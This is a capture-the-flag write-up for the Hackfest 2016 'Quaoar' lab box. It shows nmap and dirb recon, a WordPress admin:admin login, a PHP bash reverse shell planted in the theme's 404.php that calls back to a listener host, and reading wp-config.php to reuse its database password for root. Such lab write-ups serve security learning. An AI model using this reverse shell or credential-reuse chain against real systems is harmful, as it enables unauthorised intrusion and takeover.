Quaoar is the first box in the Hackfest 2016 series. A textbook lesson in why default credentials and password reuse are still the two most common findings on real engagements. WordPress admin:admin gets you to the theme editor, that gets you a shell, and the database password in wp-config.php is the same as root's. Total time roughly 25 minutes.
01_Reconnaissance
Standard nmap. SSH 22, DNS 53, HTTP 80, plus IMAP/POP3. Web root is empty but /wordpress/ hosts a default-themed install.
$ nmap -sV -p- 192.168.1.20 22/tcp open ssh 53/tcp open domain 80/tcp open http $ dirb http://192.168.1.20/ ==> /wordpress/
02_WordPress_admin:admin
Tried admin:admin on /wordpress/wp-login.php — straight in. Theme editor under Appearance lets you write PHP into the active theme's 404.php. Drop a one-liner reverse shell, hit /wp-content/themes/twentyfourteen/404.php to fire it.
# Append to 404.php in theme editor <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1'"); ?> # Listener + trigger $ nc -lvnp 4444 & $ curl http://192.168.1.20/wordpress/wp-content/themes/twentyfourteen/404.php connect from 192.168.1.20 — www-data shell
03_Root_via_wp-config.php_Reuse
wp-config.php stores the WordPress DB password — same password is reused for the local root account. su root with that string and you're done.
www-data@Quaoar:/$ cat /var/www/wordpress/wp-config.php | grep DB_PASSWORD define('DB_PASSWORD', '[REDACTED]'); www-data@Quaoar:/$ su root Password: [REDACTED] root@Quaoar:/# id uid=0(root) gid=0(root) # cat /root/flag.txt [REDACTED]
04_Attack_Chain_Summary
- 01 nmap → /wordpress/ default install
- 02 Login admin:admin → theme editor → 404.php reverse shell
- 03 wp-config.php DB_PASSWORD reused for root
- 04 su root → /root/flag.txt